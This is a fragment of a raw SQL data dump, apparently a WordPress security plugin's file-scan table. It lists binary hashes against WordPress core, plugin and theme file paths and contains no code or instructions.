��Zd�B','',0,'?'),('�8׸}��:�K���_�','wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.l�{7��2�Րl','4�+��*/�S+��!b��䢈����d��7','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb�	x\'P�:�����U','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6���I��	[NuX��','��;h\0xw�g ������)�NM|��s','',0,'?'),('�[�K� bDu �#��g','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css',0,'T���6JҨNM!d��$t','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('�f�g-�6A�[�X�~�','wp-content/plugins/redirection/locale/json/redirection-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۊ!���{�m���6�','S�j\\t�Q�1�A\n�0�������>a�&(\ZU','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl��	��u#KV���n','',0,'?'),('�y�g��zaU\"�	XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������$��a��','y���f`���D�&���LI9�@q=���A�L','',0,'?'),('����&P8��F�{�\0','wp-content/plugins/disable-gutenberg/inc/classic-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{\'��w���_��j�','Y��Ҽ(�IsՕ��7�{��t�I�,�w(���','',0,'?'),('����$�DT����ɴYP','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�����Ƕ\\�7','͐��\\ʉ�b&�朻,-��l��\Z��>�8e','',0,'?'),('���X��k�\nX�l<{M�','wp-content/plugins/redirection/redirection-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','en@�l;��yi��','�u��|�]�6iYC}`6�#�<¡S�Q�F','',0,'?'),('���\0.T��I�9����','wp-content/plugins/wordpress-seo/src/config/migrations/20201216141134_ExpandPrimaryTermIDColumnLengths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��|�_��0\0���','Q�0ՠ���y��\"�I;\n/�j�?�6��^@�','',0,'?'),('��vRz���@7��g*T','wp-includes/blocks/navigation/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|q%{P8E��â~w','�{c�A�����f�`�-�v�W<�9��-�?�','',0,'?'),('��}�Ne���АA��@�','wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z=p(��V:sK�M','@��y�|�ˈ�&�Y_B�z~̎L7�Q','',0,'?'),('�٨v��V0\ZG6�� ','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/QRDataInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pv32��:���͜','Z�𻮡��|���7������U','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('����a�I-��c�18','wp-includes/wp-includes/js/plupload/license.txt',0,'u&\n�TI�z����+�','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('��R���pB@LJ��','wp-includes/blocks/archives/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʡ<�e$��\n��','Wxث�7qC\n������g�\Z�e��6-&','',0,'?'),('��u07w>ԧ�`?��^','wp-content/plugins/wordpress-seo/src/integrations/admin/ryte-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fm\n��P�Y^�����#','UC�\"�F-�+�c�P$M�3�l/հgd�','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k��N2m�~����=','\n��F�3��͸`�f\r򼞂�=pHK�`�ӻ','',0,'?'),('���S�A� ��\rrKcY@','wp-content/plugins/wp-cerber/assets/flags/is.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɉ��j���@LA','��;1+y���w� @g�Q�m&����+c^q�','',0,'?'),('�9\r����\rK|�\r�2','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/GenericProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��#�9�j�h�\'','.��펢KN�� �@�;&��=�-\n�W8��','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�\nOO3�hi','��-|~��*T��E�N��.̴�J7�X�f#6��','',0,'?'),('�Ge��\r���AT��\0','wp-content/plugins/wp-cerber/assets/flags/mt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�4?�\0�ݦc��','i����1��rm�ދ�Z-�7`[�6,�\rn�','',0,'?'),('�Q�4��E�W�f�/','wp-content/plugins/wp-cerber/assets/flags/ad.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E~��n\\(���;S','�)g�o�yv�z/��DL����]�]g\"���','',0,'?'),('�q!6�����R�>����','wp-includes/wp-includes/js/jquery/ui/slider.min.js',0,'�%��ҏ��9�4g��','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��iz���i)��7+O','wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e8���=�.�%̝�','OM��S{�Z�N��C��Q�l\\�*����','',0,'?'),('��^�	�\"�uZ�S ','wp-includes/blocks/comment-edit-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ҫO^<w�0���','��9���B��t��_�+Q3BN\")�)�V','',0,'?'),('��(��NL�;	��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Sv�r�a��:','�!�F�å��<K�����BХ��%1��Œ','',0,'?'),('��8�qۀ]I�nS�t7','wp-includes/wp-includes/class-wp-recovery-mode-email-service.php',0,'�� ��Gu�n���Et','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��<t�lse�\0��W\\�','wp-content/plugins/wp-fastest-cache/js/lang/ru.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��r�XY��ҟ6�','ն�3�H�#�q3.����g3R\0)o�\r�����','',0,'?'),('���F�Z�\nQ�CE','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RetryMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b���8�g�զ���','>�K�衽��up7b��\')\'�,;��Q�1���y','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('��\r�m�s\0�@�=[�','wp-includes/blocks/text-columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��N\'�_���|;\0','l\'��V��~#R���vE�.%~�A��Է�,�	','',0,'?'),('��֬+I�7���^��','wp-includes/blocks/file/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�lǽ�6.��^�\'','�=T���X��m)� :�BɈej��y/�s�','',0,'?'),('��R�p�x�O�U�\"','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L-\Z���0vf\n�','�+&h-ʚ��j��FpR��$��ɩ	1#t','',0,'?'),('��\'�:s��\\��E3','wp-content/plugins/wordpress-seo/src/schema-templates/image.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lT�`xm=��in5�9','V�ғΛqk�hԩ�?W�k��\\A~��IK','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ycP�m��0#1�޶�','��bC��p������7�׍�>�O~��H~','',0,'?'),('�$�{�]�K���	','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ka.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�o��\0���ӒD�',']鿗#�����8\0\r%*C�Ui`���f����`\n�','',0,'?'),('�%Б7l���@�\r�ԩ','wp-content/plugins/wp-cerber/assets/flags/sx.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�n�dKi��}��1y�','M.��H�k��b`_%�rY�ᶈ�F�>','',0,'?'),('�0\"��G�\Z=�hV4�','wp-includes/blocks/separator/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|i�I�w�;��[�T#',']��I��R���\Z���d	�ZR���p]�O(-�','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\',��{��W!�%','�� o4AV=�A��|h�xn_����p��C�Y','',0,'?'),('�KӟG��o1�','wp-includes/wp-includes/css/dist/block-library/editor.min.css',0,'���;�rQ��E4��','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�Q��0�̭~�s�H�','wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',0,'�lo7�r79wA�U�E','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2���YT�x�w�','E�ID(10i�|�V:��^�s\ZXǂ\\�9k�O�G','',0,'?'),('��*<�{�ڛsS1>','wp-content/plugins/wordpress-seo/css/dist/admin-global-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��썩6�������m�','߇M��{��)��Mm���U��]ŸX%܊B��d','',0,'?'),('��O�����9X�KHo�','wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+Hs��x���PL�Q�','�^���\Z�7�T��\r�s���*��=�\"F�r\0G','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z	O��U�\0��.�Z','ȪR���y��w!<�5�??��\Z�n�PY5s','',0,'?'),('������\\�O_3)��','wp-includes/wp-includes/js/jquery/ui/droppable.js',0,'/���_\na��G���','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����F��2W)R�Y�','�2�A�$�?�k��Q:2X���J2�j��','',0,'?'),('�����\09= ��}a','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php',0,'M�kݢA��D�5z�yj','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('��0�W-C	{в��\'','wp-content/plugins/wp-cerber/assets/flags/hk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���K��k��=�','�C��k󴰠(ٜ�($�u�@�SM����8U�','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('��;0AV���.���r�','wp-content/plugins/wp-cerber/assets/flags/ru.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C����N�gU����W','���3�f�dh�%�p���i��G���I\\j2ä�','',0,'?'),('���\r����E�','wp-includes/wp-includes/kses.php',0,'��>F�ނS\0wt�R��','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('��=�N}	���X��y','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0TY&�d_hQ���]','gdf�i�C����������������ǚ','',0,'?'),('�ܟ�_8�H�\r$�:�','wp-content/themes/twentytwentythree/styles/electric.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ\nd�QΩ6��_�','.���zu��櫺�U�� �T�pɸ�-�','',0,'?'),('��+�B��$Hu�R�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',0,'�!K�	5y���S*','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�h�X��j\0L=2��','wp-content/plugins/redirection/locale/json/redirection-es_EC.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������u@*����\Z','�ZJ2ߔ⤙��P������(��	�','',0,'?'),('� �C�<�:�0:@��s','wp-content/plugins/wordpress-seo/src/services/health-check/ryte-runner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d5�\0m�E/�A�\"�D','	�L\'�T�����c*��#H�ι�aM�)J�','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�QM�Q=9}5GM)&�','1��\rϺL�%-�������|g� 	��','',0,'?'),('�&?R2	XP..\"�6F','wp-content/plugins/wordpress-seo/src/loggers/logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�2���/=���','�XP����F�\'\\�<��#��O�:�&&}���.w�','',0,'?'),('�*�5uj���p��‹','wp-content/plugins/wordpress-seo/src/conditionals/wp-robots-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��\"i)%�l\r�\"���]','�Z���������{� �\Z�iUR�E\\�','',0,'?'),('�F߇���#��ata�','wp-includes/block-patterns/query-small-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f@�I�va�=9��uQ','ͷ%w@3#����F�Zq��t`�s�o���','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���\nm���a���','�~�`f�D���\n/&eFZړ�<A-=}%�8W\Z�L','',0,'?'),('�S7��zǫ�W�~�2�','wp-includes/blocks/site-tagline/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ�	�ؿߥ��~��E��k��,f����f�R','',0,'?'),('�T�٧r��\0����','wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�3mX\\�\r�z~]�6','�Y�%G���*�0�e�i����%���k��P2','',0,'?'),('�U4���Nb<#��_�','wp-includes/blocks/video/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��Ц�(��p����','ɩa@�8�*{�Ow����pǛ����|$�!��','',0,'?'),('�[�����נ���h','wp-content/plugins/wp-smushit/core/integrations/class-avada.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U(\rK�Ey4ጫ���','鞖��K�=e��Ft�\\�E��+t_��7��','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�e��P�-�+�T�;ğ�','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/webmaster-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2_aȊ�B<$�L`��x','�~���\n�d,����E�+:� ��w\r&�','',0,'?'),('�h}�V�<𛔵��','wp-content/plugins/wp-smushit/app/views/cdn/upsell-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�-�/ۈy�[','������_W�}��bCu~&&��q@���','',0,'?'),('�j\\��S���7S��rz','wp-content/plugins/wp-smushit/core/modules/class-dir.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѣ�wD^Ŵ\nށ���','���FV9�#�.�*y���<��F �;�[��Qj�','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�u�\n&fm���q�C�','wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�A��rv���M��','�A����]�ROX^^yij��M��poJ�t�L','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"L�!Q�8�5�k�^�J�','��߽#rk�qo��`8>-�(r�e܇q�U�','',0,'?'),('�|~�X1��S��,','wp-includes/wp-includes/images/w-logo-blue.png',0,'�[N�W��_p�w�0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('��w�h��M�M0��^�','wp-content/plugins/redirection/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1����\"�\0�','�C�qrtf�5��8�b�I�D���:/@j�a�M�','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��0apX��ƺ��F','E���Y8�rϞ�b��B��$�����y#����','',0,'?'),('�ͫ5��>]������t','wp-content/plugins/wordpress-seo/src/models/indexable-extension.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��|\0�$�3��1l0','��Q�<�.��0]�Zk�:�޸:/�m�����','',0,'?'),('��֥��R�K�!�tt�','wp-includes/wp-includes/js/dist/priority-queue.min.js',0,'[�9(�����&!�x�','[�9(�����&!�x�','5�r�Q���b�͔5�t����>:js-O','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qx+�D.42\0����','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('��n��ރ�z:�V0','wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js',0,'�Z=\ro<3��E���','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('�����$�Oq�yܹ�','wp-includes/blocks/audio/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �҃�9�0��6n	�',' �B5��e7�	?,�����Bv�*G/�\'&@','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c+9O˚d��/�R\n','�>����s�$���/���C �y���v�','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zk�Yĕ��q�t>�O\r','N�����`X[�����|˖�$G�Wb�\"e���','',0,'?'),('�	� n�@شu�]�w','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/eu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٿ��j��l��w�','>^���_8�x��MBɒ�E\n���yâAKN�','',0,'?'),('��EEtz����9Yg�-','wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',0,'�j�<�]�@����	4�','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('�\r��l�bt�:��','wp-includes/wp-includes/js/jquery/ui/effect-scale.js',0,',ʡ0��\\K4\'��t�',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('�5Y\'�ڀ���`��ѫ','wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�6`�8U��-','�p�qb,��D������.:��s1ȥ�','',0,'?'),('�7���/*��d�	','wp-content/plugins/wp-cerber/assets/flags/th.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9T�4��#%�q��','\ZpD�E�{ݳ/\\`\Z��9�܊<Wv�_�j','',0,'?'),('�C�Ƈtdf�T�c/�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ps.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�LJ�\'����\"�=�','�6)Z�M[r�}���q�T��ȇ�sЩ�','',0,'?'),('�\\Д��h��c��','wp-includes/blocks/page-list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1\rJb��ޭ��ֳ','�yxQ{�0�I�Tcf�%���%�+�N�G�','',0,'?'),('�^�;�*\n�d�8H�ᵿ','wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',0,'��ئT�Ь�Ԅc�/��','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�a�<�d��Q�8���','wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�/@չ���8FJW%','[�H�V͎��]܊7F�B	�#��Aշ�E�\r$','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�o���4���f?$�','wp-content/plugins/wordpress-seo/src/conditionals/admin/posts-overview-or-ajax-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ָ�DU�~��C�8�','��f�Y{�FY&c��;�k���+�<�{���	�','',0,'?'),('�~n�\n��b����[�#','wp-includes/wp-includes/images/crystal/audio.png',0,'�nV�:�ω�G��-#k','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j���4L<ڠǡ�','*�>\0�#$J�Y�T�ް�����Ll���<�\n�fX','',0,'?'),('�����.�h��:3�','wp-content/plugins/wordpress-seo/js/dist/react-select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�4��^K���^�','����x]d����R頂���Q��k����','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w$�1)x5)L��{p','�Ljv��㡴y\"0�Mp�@���R�Tඒ�K�','',0,'?'),('��6y�a51�R�*�\'|','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/MessageFormatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ۭUB�G�{�P��','���H\'�u���`,%TB꾷�z\nn����25','',0,'?'),('��Α��>=����]�','wp-includes/wp-includes/js/jquery/ui/effect.js',0,'�j�Bs*C���x�','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('��H����|��5���H','wp-content/plugins/redirection/locale/json/redirection-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r���C�,�Fۊ+','n,�+i\Z�2��&c6BnOӵ�pFo�N2�x�|}','',0,'?'),('��1�@j��w}�üJaX','wp-content/plugins/wordpress-seo/inc/class-wpseo-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��Ϩ@\Z�Xf8D��','T�I�n����4qKN�)^��� �a�\Z��|-!','',0,'?'),('��N*yVy�Q�Qj§,C','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Light.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gd1ȓX*_j%\r��','�I�XS��>;]^�q�3��\"`���d�5�9��','',0,'?'),('��p�4�kcQ�(0��h','wp-includes/blocks/avatar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I*�\\�ԗ�Wa��\r+','ځ�S�P|�%._�R�G���|��e8Q]���','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pa�UW��ߍ�}c�u','�̯�qQ�Wx��$ӴL�lq��$��{q�*a`','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M������/����','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�\n��Z��R��`#','��J$�!�#XD��\"�W�������i��\n�','',0,'?'),('��+�c;����55�','wp-content/plugins/redirection/database/database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����0�*-\n�@\'9','�үN�80�d\n}�mt��f�y�*�M�\0��N','',0,'?'),('�\0wH�O��gNO9T�','wp-content/plugins/wp-smushit/_src/js/smush/cdn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O1=FK})ڴ7i','��o�u%C���BQ�\0��j���a0��.g;','',0,'?'),('�	-Aw�˾j\ZsGz��','wp-content/plugins/wordpress-seo/css/dist/edit-page-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J2I�(�<����','���H|�+[uI��4�02x\'4�X�b�@?�m�','',0,'?'),('��z��J/�B&C�%','wp-includes/blocks/post-featured-image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^���%}\'\\��*�','�mM��_�{�JY��0�yy.��iZ�v�v','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 